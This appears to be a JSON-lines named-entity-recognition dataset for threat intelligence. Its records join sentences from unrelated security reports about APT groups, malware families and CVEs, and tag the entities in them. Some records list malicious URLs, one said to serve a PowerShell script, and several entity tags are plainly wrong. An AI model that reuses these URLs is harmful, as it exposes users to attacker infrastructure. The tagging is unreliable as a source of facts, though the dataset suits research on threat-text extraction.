{"text": "As the investigation progressed , Talos came to understand that this campaign was associated with the \" ChristinaMorrow '' text message spam scam previously spotted in Australia . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . It’s also heavily obfuscated , but in a slightly different way than the backdoor . Commands to the remote system , and often the results of those commands , will be embedded within the protocol traffic between the client and server .", "spans": {"ORGANIZATION: Talos": [[34, 39]], "TOOL: PIVY": [[196, 200]], "VULNERABILITY: zero-day exploit": [[222, 238]]}, "info": {"id": "cyberner_stix_train_001815", "source": "cyberner_stix_train"}}
{"text": "“ Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet. ” “ Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet , ” says Lukáš Štefanko , the ESET malware researcher who discovered the malicious app . In the first few months of their credential phishing ventures , Scattered Canary’s sights were mostly set on Asian targets—Malaysia and Japan , in particular . Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist .", "spans": {"SYSTEM: Twitter": [[8, 15]], "SYSTEM: Android": [[93, 100], [204, 211]], "ORGANIZATION: Twitter": [[119, 126]], "ORGANIZATION: ESET": [[249, 253]], "THREAT_ACTOR: Scattered Canary’s": [[372, 390]], "THREAT_ACTOR: Lazarus Group": [[568, 581]], "ORGANIZATION: bank": [[601, 605]]}, "info": {"id": "cyberner_stix_train_001816", "source": "cyberner_stix_train"}}
{"text": "This gives the operators the capability to trick the user into accessing any site while stealing the user 's cookies or forging form fields , like account numbers or phone numbers . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[261, 273]], "THREAT_ACTOR: OilRig": [[295, 301]], "THREAT_ACTOR: Crambus": [[304, 311]], "THREAT_ACTOR: APT34": [[318, 323]], "THREAT_ACTOR: COBALT TRINITY": [[328, 342]], "THREAT_ACTOR: Elfin": [[357, 362]], "THREAT_ACTOR: APT33": [[367, 372]], "THREAT_ACTOR: APT38": [[375, 380]], "ORGANIZATION: banks": [[427, 432]], "ORGANIZATION: financial entities": [[437, 455]]}, "info": {"id": "cyberner_stix_train_001817", "source": "cyberner_stix_train"}}
{"text": "The campaign seeks to deliver Anubis , a particularly nasty piece of malware that was originally used for cyber espionage and retooled as a banking trojan . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder . During 2018 , Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak S-APT/CobaltGoblin cybercrime groups . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user ’s email address and password ) .", "spans": {"MALWARE: Anubis": [[30, 36]], "ORGANIZATION: Iranians": [[224, 232]], "ORGANIZATION: Europol": [[340, 347]], "ORGANIZATION: DoJ": [[352, 355]], "THREAT_ACTOR: FIN7": [[398, 402]], "THREAT_ACTOR: Carbanak S-APT/CobaltGoblin": [[407, 434]]}, "info": {"id": "cyberner_stix_train_001818", "source": "cyberner_stix_train"}}
{"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": {"MALWARE: CARBANAK": [[80, 88]], "ORGANIZATION: audiences": [[386, 395]]}, "info": {"id": "cyberner_stix_train_001819", "source": "cyberner_stix_train"}}
{"text": "No other significant changes were observed in the Trojan ’ s network behavior . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": {"MALWARE: malicious Word documents": [[101, 125]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[154, 218]], "VULNERABILITY: CVE-2014-6332": [[230, 243]], "MALWARE: WannaCry": [[288, 296]], "MALWARE: WCry": [[303, 307]], "MALWARE: WanaCrypt0r": [[315, 326]], "ORGANIZATION: telecommunications": [[504, 522]], "ORGANIZATION: shipping": [[525, 533]], "ORGANIZATION: car manufacturers": [[536, 553]], "ORGANIZATION: universities": [[556, 568]], "ORGANIZATION: health care industries": [[573, 595]]}, "info": {"id": "cyberner_stix_train_001820", "source": "cyberner_stix_train"}}
{"text": "Our private reports subscription customers receive a steady stream of YARA , IOC , and reports on Sofacy , our most reported APT for the year .", "spans": {"TOOL: YARA": [[70, 74]], "TOOL: IOC": [[77, 80]], "THREAT_ACTOR: Sofacy": [[98, 104]]}, "info": {"id": "cyberner_stix_train_001821", "source": "cyberner_stix_train"}}
{"text": "All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"TOOL: C2": [[215, 217]], "THREAT_ACTOR: TG-3390": [[273, 280]]}, "info": {"id": "cyberner_stix_train_001822", "source": "cyberner_stix_train"}}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "FILEPATH: Panda Banker": [[183, 195]]}, "info": {"id": "cyberner_stix_train_001823", "source": "cyberner_stix_train"}}
{"text": "This stealth technique has been gaining popularity among adware-related threats distributed via Google Play . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents .", "spans": {"SYSTEM: Google Play": [[96, 107]], "THREAT_ACTOR: groups": [[138, 144]], "ORGANIZATION: government": [[193, 203]], "ORGANIZATION: electric": [[217, 225]]}, "info": {"id": "cyberner_stix_train_001824", "source": "cyberner_stix_train"}}
{"text": "However , the app does create a WebView and registers a JavaScript interface to this class . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data . Unloads ZxShell and deletes all of the active components . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": {"THREAT_ACTOR: APT40": [[117, 122]], "TOOL: credential-harvesting tools": [[128, 155]], "MALWARE: ZxShell": [[351, 358]], "VULNERABILITY: CVE-2022 - 41123": [[414, 430]], "ORGANIZATION: ZDI": [[454, 457]]}, "info": {"id": "cyberner_stix_train_001825", "source": "cyberner_stix_train"}}
{"text": "If the device gets locked , the malware can ’ t unlock it . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": {"THREAT_ACTOR: TA505": [[170, 175]], "ORGANIZATION: high profile companies": [[291, 313]], "ORGANIZATION: Department of Homeland Security": [[419, 450]], "ORGANIZATION: DHS": [[453, 456]], "ORGANIZATION: Federal Bureau of Investigation": [[467, 498]], "ORGANIZATION: FBI": [[501, 504]]}, "info": {"id": "cyberner_stix_train_001826", "source": "cyberner_stix_train"}}
{"text": "In October 2015 , we observed several campaigns in which TA505 targeted Japanese and UK organizations with the Shifu banking Trojan .", "spans": {"THREAT_ACTOR: TA505": [[57, 62]], "MALWARE: Shifu": [[111, 116]], "MALWARE: Trojan": [[125, 131]]}, "info": {"id": "cyberner_stix_train_001827", "source": "cyberner_stix_train"}}
{"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit.in forum as a botnet for rent . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase . Organizations must do better to safeguard their sensitive data and combat the growing ransomware threats by leveraging key prevention , detection and response components .", "spans": {"MALWARE: Gustuff": [[56, 63]], "THREAT_ACTOR: threat actor": [[235, 247]]}, "info": {"id": "cyberner_stix_train_001828", "source": "cyberner_stix_train"}}
{"text": "Last year , OurMine victimized Marvel , The New York Times , and even the heads of some of the biggest technology companies in the world . In two months , the group returned to their proven method and withdrew funds again through ATMs .", "spans": {"THREAT_ACTOR: OurMine": [[12, 19]], "ORGANIZATION: The New York Times": [[40, 58]], "ORGANIZATION: technology companies": [[103, 123]]}, "info": {"id": "cyberner_stix_train_001829", "source": "cyberner_stix_train"}}
{"text": "The author ( s ) of this malware wrote separate subroutines that identify the operating system version and fire off methods to obtain a list of currently running applications known to work on that particular version of Android . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks . opaque predicates were applied to Turla mosquito and APT10 ANEL . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": {"SYSTEM: Android": [[219, 226]], "ORGANIZATION: Talos": [[248, 253]], "TOOL: ROKRAT": [[338, 344]], "THREAT_ACTOR: Turla": [[422, 427]], "MALWARE: mosquito": [[428, 436]], "THREAT_ACTOR: APT10": [[441, 446]], "MALWARE: ANEL": [[447, 451]], "ORGANIZATION: CrowdStrike": [[469, 480]], "VULNERABILITY: CVE-2022 - 41040": [[564, 580]]}, "info": {"id": "cyberner_stix_train_001830", "source": "cyberner_stix_train"}}
{"text": "While Canada-targeted threats are not new , Emotet in particular , with its frequent region-specific email campaigns , is bringing new attention to geo-targeting in Canada and beyond . The Word document usually exploits CVE-2012-0158 .", "spans": {"TOOL: Emotet": [[44, 50]], "TOOL: Word": [[189, 193]], "VULNERABILITY: CVE-2012-0158": [[220, 233]]}, "info": {"id": "cyberner_stix_train_001831", "source": "cyberner_stix_train"}}
{"text": "A closer review of the file names revealed “ IT Worx ” and “ MCI ” .", "spans": {"ORGANIZATION: IT Worx": [[45, 52]], "ORGANIZATION: MCI": [[61, 64]]}, "info": {"id": "cyberner_stix_train_001832", "source": "cyberner_stix_train"}}
{"text": "The first one executes a PowerShell script served from http://139.59.46.154:3485/eiloShaegae1 .", "spans": {"MALWARE: The first one": [[0, 13]], "TOOL: PowerShell": [[25, 35]], "URL: http://139.59.46.154:3485/eiloShaegae1": [[55, 93]]}, "info": {"id": "cyberner_stix_train_001833", "source": "cyberner_stix_train"}}
{"text": "The value of the first item , whose key is “ method ” ( line 7 ) , indicates the type of the contents : install , info and sms . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload . Gamaredon : http://win-apu.ddns.net/apu.dot/ . None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": {"THREAT_ACTOR: group": [[254, 259]], "THREAT_ACTOR: threat actors": [[263, 276]], "THREAT_ACTOR: Gamaredon": [[322, 331]], "URL: http://win-apu.ddns.net/apu.dot/": [[334, 366]]}, "info": {"id": "cyberner_stix_train_001834", "source": "cyberner_stix_train"}}
{"text": "As a rule , bots self-proliferate by sending out text messages with a malicious link to addresses in the victim ’ s address book . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) . When the malicious DLL is loaded at hpqhvind.exe startup , its DLLMain function is called that will check its parent process for the following sequence of bytes at offset 0x10BA . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": {"TOOL: HyperBro": [[182, 190]], "TOOL: Remote Access Trojan": [[195, 215]], "TOOL: RAT": [[218, 221]], "TOOL: DLL": [[245, 248]], "FILEPATH: hpqhvind.exe": [[262, 274]]}, "info": {"id": "cyberner_stix_train_001835", "source": "cyberner_stix_train"}}
{"text": "In addition to the value of the intelligence , the threat actors could also exploit this access for other malicious activity , such as generating spearphishing emails from internal email addresses to compromise the organizations' networks with malware .", "spans": {"TOOL: emails": [[160, 166]], "TOOL: email": [[181, 186]]}, "info": {"id": "cyberner_stix_train_001836", "source": "cyberner_stix_train"}}
{"text": "throughout the Android package . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists . Although these points do not definitively tie WATERSPOUT to APT12 , they do indicate a possible connection between the WATERSPOUT campaign , the THREEBYTE campaign , and the HIGHTIDE campaign attributed to APT12 . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": {"SYSTEM: Android": [[15, 22]], "MALWARE: WATERSPOUT": [[175, 185], [248, 258]], "THREAT_ACTOR: APT12": [[189, 194], [335, 340]], "MALWARE: THREEBYTE": [[274, 283]], "MALWARE: HIGHTIDE": [[303, 311]]}, "info": {"id": "cyberner_stix_train_001837", "source": "cyberner_stix_train"}}
{"text": "The loader will then create the batch file %LOCALAPPDATA%\\cdnver.bat , which it will write the following :", "spans": {"FILEPATH: %LOCALAPPDATA%\\cdnver.bat": [[43, 68]]}, "info": {"id": "cyberner_stix_train_001838", "source": "cyberner_stix_train"}}
{"text": "The app checks if the device ’ s network matches one of those provided by the server . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines . This handle value is invalid : all the windows kernel handle values are by design a multiple of 4 . It has an interesting way of loading the malicious JavaScript we had not seen before either .", "spans": {"THREAT_ACTOR: BARIUM": [[87, 93]], "THREAT_ACTOR: APT17": [[137, 142]], "THREAT_ACTOR: Axiom": [[145, 150]], "THREAT_ACTOR: Deputy": [[155, 161]], "THREAT_ACTOR: Dog": [[162, 165]], "TOOL: ShadowPad": [[197, 206]], "TOOL: CCleaner": [[211, 219]], "TOOL: software updates": [[279, 295]], "SYSTEM: windows": [[360, 367]]}, "info": {"id": "cyberner_stix_train_001839", "source": "cyberner_stix_train"}}
{"text": "Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running :", "spans": {"TOOL: ELF": [[87, 90]]}, "info": {"id": "cyberner_stix_train_001840", "source": "cyberner_stix_train"}}
{"text": "While some of these acquisition are performed purely through code in mike.jar , some others that require access to , for example , SQLite databases or other files in the application 's storage are performed through rootdaemon instead , which should be running with root privileges . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . The document lowers the victim ’s suspicions by distracting them with a real document while the dropper installs the backdoor . This file contains the ransom note .", "spans": {"ORGANIZATION: Kaspersky Lab": [[303, 316]], "MALWARE: anomalous network traffic": [[361, 386]], "ORGANIZATION: government organization": [[392, 415]], "MALWARE: backdoor": [[543, 551]]}, "info": {"id": "cyberner_stix_train_001841", "source": "cyberner_stix_train"}}
{"text": "Evolution The initial version of the malware dates back to early June 2019 , masquerading as a “ Google Play Verificator ” app . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Due to overlapping TTPs , including similar custom tools , DragonOK is thought to have a direct or indirect relationship with the threat group Moafee .", "spans": {"SYSTEM: Google Play Verificator": [[97, 120]], "ORGANIZATION: Kaspersky": [[145, 154]], "THREAT_ACTOR: DragonOK": [[291, 299]], "THREAT_ACTOR: group Moafee": [[369, 381]]}, "info": {"id": "cyberner_stix_train_001842", "source": "cyberner_stix_train"}}
{"text": "Hence , the time between the victim running the downloader and the operators ’ first commands is only a few minutes .", "spans": {}, "info": {"id": "cyberner_stix_train_001843", "source": "cyberner_stix_train"}}
{"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities CVE-2018-8174 in the wild .", "spans": {"THREAT_ACTOR: Whitefly": [[10, 18]], "ORGANIZATION: healthcare": [[53, 63]], "ORGANIZATION: media": [[66, 71]], "ORGANIZATION: telecommunications": [[74, 92]], "ORGANIZATION: engineering sectors": [[99, 118]], "ORGANIZATION: 360 Core Security": [[143, 160]], "THREAT_ACTOR: APT-C-06": [[193, 201]], "VULNERABILITY: 0-day": [[231, 236]], "VULNERABILITY: CVE-2018-8174": [[253, 266]]}, "info": {"id": "cyberner_stix_train_001844", "source": "cyberner_stix_train"}}
{"text": "The txt message uses social engineering to dupe unsuspecting users into clicking on a link to a downloadable Android application . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . The code catches the “ hxe_prealloc ” The malware verifies that the server is authentic by downloading a signature file that is signed by the server and ensuring that it is the right one to make the operation more resilient to takedowns", "spans": {"SYSTEM: Android": [[109, 116]], "THREAT_ACTOR: attackers": [[171, 180]], "TOOL: DDE protocol": [[206, 218]], "MALWARE: malware": [[326, 333]]}, "info": {"id": "cyberner_stix_train_001845", "source": "cyberner_stix_train"}}
{"text": "Still included in the last versions , this screen is only used to overlay the official Google Play Store app . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . There is minimal public information regarding the Nameless Backdoor , except for the interesting report from Cyphort in 2015 .", "spans": {"SYSTEM: Google Play Store": [[87, 104]], "TOOL: Visma endpoints": [[221, 236]], "MALWARE: Nameless Backdoor": [[324, 341]], "ORGANIZATION: Cyphort": [[383, 390]]}, "info": {"id": "cyberner_stix_train_001846", "source": "cyberner_stix_train"}}
{"text": "] com ) : Contains android packages , java archives and zip archives with exploits Archive Link domains : Three domains with the same functionality , but the application chooses one of them to send request for archive link . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals .", "spans": {"SYSTEM: android": [[19, 26]], "ORGANIZATION: Secureworks": [[264, 275]], "THREAT_ACTOR: BRONZE BUTLER": [[287, 300]], "VULNERABILITY: CVE-2016-7836": [[367, 380]], "MALWARE: Powermud": [[521, 529]], "MALWARE: Powemuddy": [[533, 542]], "THREAT_ACTOR: Seedworm": [[545, 553]], "TOOL: email": [[679, 684]]}, "info": {"id": "cyberner_stix_train_001847", "source": "cyberner_stix_train"}}
{"text": "Unit 61486 is the 12th Bureau of the PLA 's 3rd General Staff Department ( GSD ) and is headquartered in Shanghai , China . The first Potao campaign that we examined took place in August 2011 .", "spans": {"THREAT_ACTOR: Unit 61486": [[0, 10]]}, "info": {"id": "cyberner_stix_train_001848", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]], "MALWARE: network-driven backdoors": [[222, 246]], "MALWARE: modular backdoors": [[272, 289]], "MALWARE: harvesting tools": [[292, 308]], "MALWARE: wipers": [[315, 321]]}, "info": {"id": "cyberner_stix_train_001849", "source": "cyberner_stix_train"}}
{"text": "Third-party marketplaces or some other attacker-controlled domains are likely used to host the sample . Now , Silence is one of the most active threat actors targeting the financial sector . As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process .", "spans": {"THREAT_ACTOR: Silence": [[110, 117]], "ORGANIZATION: financial": [[172, 181]], "ORGANIZATION: M-Trends": [[253, 261]], "THREAT_ACTOR: FIN7": [[276, 280]]}, "info": {"id": "cyberner_stix_train_001850", "source": "cyberner_stix_train"}}
{"text": "] 147 Red Alert 2.0 : Android Trojan targets security-seekers A malicious , counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea . Among all these random keys once the word “salamati” was also used, which means “health” in . It has legitimate uses but is widely used by attackers to help map a network .", "spans": {"MALWARE: Red Alert 2.0": [[6, 19]], "SYSTEM: Android": [[22, 29]], "SYSTEM: VPN": [[101, 104]], "THREAT_ACTOR: APT37": [[264, 269]]}, "info": {"id": "cyberner_stix_train_001851", "source": "cyberner_stix_train"}}
{"text": "Conclusion Although the actor behind “ Agent Smith ” decided to make their illegally acquired profit by exploiting the use of ads , another actor could easily take a more intrusive and harmful route . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . The emails are well written , with an abundance of detail . The report says the data was kept anonymous , but the companies could “ easily ” use the information to identify individuals or create targeted advertising for them .", "spans": {"MALWARE: Agent Smith": [[39, 50]], "VULNERABILITY: Nitris Exploit Kit": [[228, 246]], "VULNERABILITY: CottonCastle": [[268, 280]], "TOOL: emails": [[361, 367]]}, "info": {"id": "cyberner_stix_train_001852", "source": "cyberner_stix_train"}}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": {"MALWARE: GoogleUpdate.exe": [[4, 20]], "FILEPATH: Android version": [[97, 112]]}, "info": {"id": "cyberner_stix_train_001853", "source": "cyberner_stix_train"}}
{"text": "Trend Micro published their analysis of the FakeM Trojan on January 17 , 2013 that discussed the original variant of FakeM . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "TOOL: FakeM Trojan": [[44, 56]], "TOOL: FakeM": [[117, 122]], "THREAT_ACTOR: APT35": [[125, 130]], "ORGANIZATION: military": [[177, 185]], "ORGANIZATION: diplomatic": [[188, 198]], "ORGANIZATION: government personnel": [[203, 223]], "ORGANIZATION: organizations": [[226, 239]], "ORGANIZATION: media": [[247, 252]], "ORGANIZATION: energy": [[255, 261]], "ORGANIZATION: defense industrial base": [[266, 289]], "ORGANIZATION: DIB": [[292, 295]], "ORGANIZATION: engineering": [[304, 315]], "ORGANIZATION: business services": [[318, 335]], "ORGANIZATION: telecommunications sectors": [[340, 366]]}, "info": {"id": "cyberner_stix_train_001854", "source": "cyberner_stix_train"}}
{"text": "Only 20 of the 213 short links have been clicked as of this publication .", "spans": {}, "info": {"id": "cyberner_stix_train_001855", "source": "cyberner_stix_train"}}
{"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Callisto Group appears to be intelligence gathering related to European foreign and security policy .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: attackers": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]]}, "info": {"id": "cyberner_stix_train_001857", "source": "cyberner_stix_train"}}
{"text": "From a technical point of view , the sample is a unique spy implant with stand-out features such as device sensors listeners , including motion detectors that have been implemented with a degree of originality . McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . SniffPass ( SniffPass ) : Tool designed to steal passwords by sniffing network traffic . The practical relationship between security , risk , and decision making is well articulated by the US Department of Homeland Security as it is described as an approach for making security decisions .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[212, 243]], "ORGANIZATION: ATR": [[246, 249]], "THREAT_ACTOR: cybercrime group": [[347, 363]], "THREAT_ACTOR: Lazarus": [[364, 371]], "TOOL: sophisticated malware": [[382, 403]], "MALWARE: SniffPass": [[428, 437], [440, 449]], "ORGANIZATION: the US Department of Homeland Security": [[613, 651]]}, "info": {"id": "cyberner_stix_train_001858", "source": "cyberner_stix_train"}}
{"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk . It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel . The injected code calls out a first domain ( seen above encoded in Base64 ) and generates a Base64 response : Decoding it reveals a URL pointing to the actual skimming code , which is heavily obfuscated ( likely via obfuscator.io ): The data exfiltration is also done differently as seen in the image below .", "spans": {"TOOL: Truvasys": [[359, 367]], "ORGANIZATION: computer utilities": [[465, 483]], "ORGANIZATION: WinUtils": [[496, 504]], "ORGANIZATION: TrueCrypt": [[507, 516]], "ORGANIZATION: WinRAR": [[519, 525]], "ORGANIZATION: SanDisk": [[531, 538]], "TOOL: office": [[606, 611]], "TOOL: obfuscator.io": [[894, 907]]}, "info": {"id": "cyberner_stix_train_001859", "source": "cyberner_stix_train"}}
{"text": "The code above also tells us the actors had created their own custom “ encoder ” within the AntSword Shell Manager to be able to interact with the code above , which we will discuss in detail in the next section .", "spans": {"TOOL: AntSword": [[92, 100]], "TOOL: Shell Manager": [[101, 114]]}, "info": {"id": "cyberner_stix_train_001860", "source": "cyberner_stix_train"}}
{"text": "The registrant contact details of the C & C domains used in the campaign , for instance , were masked . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . This error allowed us to follow the infrastructure week by week , until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018 . If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim ’s authentication credentials or cookies with a “ man - in - the - middle \" attack .", "spans": {"ORGANIZATION: Kaspersky Lab": [[119, 132], [260, 273]], "VULNERABILITY: zero-day": [[198, 206]], "ORGANIZATION: Twitter": [[402, 409]], "TOOL: C2": [[439, 441]], "THREAT_ACTOR: the attacker": [[495, 507]]}, "info": {"id": "cyberner_stix_train_001861", "source": "cyberner_stix_train"}}
{"text": "In 2015 , SkyEye Labs , the security research division of the Chinese firm Qihoo 360 , released a report detailing threat actors that were targeting Chinese public and private entities including government agencies , research institutes , maritime agencies , sea construction , and shipping enterprises . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": {"ORGANIZATION: SkyEye Labs": [[10, 21]], "ORGANIZATION: Qihoo 360": [[75, 84]], "ORGANIZATION: government agencies": [[195, 214]], "ORGANIZATION: research institutes": [[217, 236]], "ORGANIZATION: maritime agencies": [[239, 256]], "ORGANIZATION: sea construction": [[259, 275]], "ORGANIZATION: shipping enterprises": [[282, 302]], "THREAT_ACTOR: OceanLotus’": [[311, 322]], "ORGANIZATION: foreign governments": [[475, 494]], "ORGANIZATION: activists": [[497, 506]], "ORGANIZATION: dissidents": [[513, 523]]}, "info": {"id": "cyberner_stix_train_001862", "source": "cyberner_stix_train"}}
{"text": "Although the 2015 campaign did not focus on individuals associated with U.S. politics , open-source evidence suggests that TG-4127 targeted individuals connected to the U.S. White House in early 2015 .", "spans": {"THREAT_ACTOR: TG-4127": [[123, 130]]}, "info": {"id": "cyberner_stix_train_001863", "source": "cyberner_stix_train"}}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 EternalBlue patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[187, 195]], "MALWARE: checker1.exe": [[196, 208]], "MALWARE: PsExec": [[293, 299]], "MALWARE: psexec.exe": [[320, 330]], "TOOL: emails": [[403, 409]], "FILEPATH: Microsoft Word attachment": [[417, 442]], "VULNERABILITY: CVE-2017-0199": [[475, 488]], "MALWARE: ZeroT Trojan": [[503, 515]], "MALWARE: PlugX Remote Access Trojan": [[547, 573]], "MALWARE: RAT": [[576, 579]]}, "info": {"id": "cyberner_stix_train_001864", "source": "cyberner_stix_train"}}
{"text": "The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": {"ORGANIZATION: iSIGHT Partners": [[140, 155]], "ORGANIZATION: customers": [[231, 240]]}, "info": {"id": "cyberner_stix_train_001865", "source": "cyberner_stix_train"}}
